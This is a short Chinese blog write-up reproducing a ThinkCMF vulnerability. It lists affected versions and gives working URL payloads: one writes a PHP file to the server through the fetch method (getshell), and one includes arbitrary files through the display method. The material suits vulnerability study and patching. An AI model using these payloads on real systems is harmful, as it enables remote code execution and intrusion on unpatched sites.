ThinkCMF 任意包含漏洞附前台Getshell复现


简介

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。
ThinkCMF提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的需求以应用的形式进行扩展。
每个应用都能独立的完成自己的任务,也可通过系统调用其他应用进行协同工作。在这种运行机制下,开发商场应用的用户无需关心开发SNS应用时如何工作的,但他们之间又可通过系统本身进行协调,大大的降低了开发成本和沟通成本。

漏洞简介

攻击者可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到远程代码执行的目的。

影响版本

ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

漏洞利用

第一种 前台Getshell

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件
phpinfo版payload如下:

1
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

随即访问 test.php

第二种 任意文件包含

通过构造a参数的display方法,实现任意内容包含漏洞
payload:

1
?a=display&templateFile=README.md

复现完毕 漏洞分析请参考如下文章

ThinkCMF任意包含漏洞分析及复现

------ 本文结束 ------

本文标题:ThinkCMF 任意包含漏洞附前台Getshell复现

文章作者:ApiCoder

发布时间:2019年11月15日 - 12:11

最后更新:2019年11月15日 - 13:11

原始链接:http://www.safeinfo.me/2019/11/15/ThinkCMF-任意包含漏洞附前台Getshell复现.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

ApiCoder wechat
扫一扫,加入信安圈。
0%